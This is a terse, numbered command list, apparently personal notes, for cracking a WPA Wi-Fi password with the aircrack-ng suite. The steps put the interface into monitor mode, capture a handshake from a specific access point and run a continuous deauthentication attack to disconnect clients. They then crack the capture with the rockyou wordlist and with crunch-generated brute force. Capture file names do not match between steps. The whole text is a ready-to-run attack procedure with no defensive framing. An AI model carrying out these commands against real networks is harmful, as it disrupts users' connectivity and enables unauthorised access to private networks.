1 iwconfig                               
2 airmon-ng check           
3 airmon-ng check kill
4 airmon-ng start wlan0 
5 airodump-ng wlan0
6 airodump-ng wlan0 -d A6:4A:D5:A5:58:B4
airodump-ng -w Sabaz1 -c 6 --bssid A6:4A:D5:A5:58:B4 wlan0  

 Unzip the rockyou file
  7 gunzip /usr/share/wordlists/rockyou.txt.gz

 after crack hack1-01.cap file by dictionery attack
8 aircrack-ng Sabaz1-01.cap -w /usr/share/wordlists/rockyou.txt 

after crack Sabaz1-01.cap file by brute force attack
9 crunch  6 12 abcdef12345 | aircrack-ng hack1-01.cap -b A6:4A:D5:A5:58:B4 -w-

Second Terminal 
6 aireplay-ng --deauth 0 -a A6:4A:D5:A5:58:B4 wlan0 

